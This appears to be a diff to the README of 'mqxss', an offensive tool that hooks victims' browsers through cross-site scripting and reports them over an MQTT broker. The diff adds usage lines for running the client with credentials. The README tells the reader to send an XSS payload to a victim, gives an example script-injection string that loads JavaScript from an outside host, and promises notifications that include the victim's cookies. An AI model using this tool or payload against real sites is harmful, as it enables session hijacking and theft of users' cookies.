grampae/mqxss/README.md

 ## Directions

-**To generate a JS payload** to hook browsers with set the -g flag at runtime along with your broker, port and topic variables.
+**To generate a JS payload** to hook browsers with set the `-g` flag at runtime along with your broker, port and topic variables.
 Doing so will create your payload in the /js/ folder.

 **To run the client** provide your broker, port, and topic as so

 `mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname`

+**To run the client with credentials** provide your broker, port, user name, password and topic as so

+`mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password`

 **Send your XSS payload** to the victim while the mqxss client is running, ex: `'"><script src=https://example.com/x.js></script>` or something similar, if vulnerable you should get a notification saying the browser has connected with some basic details including cookies etc.

 ![a](https://github.com/grampae/mqxss/assets/36344197/20096c91-2e9e-4302-b5a9-e2edd665d382)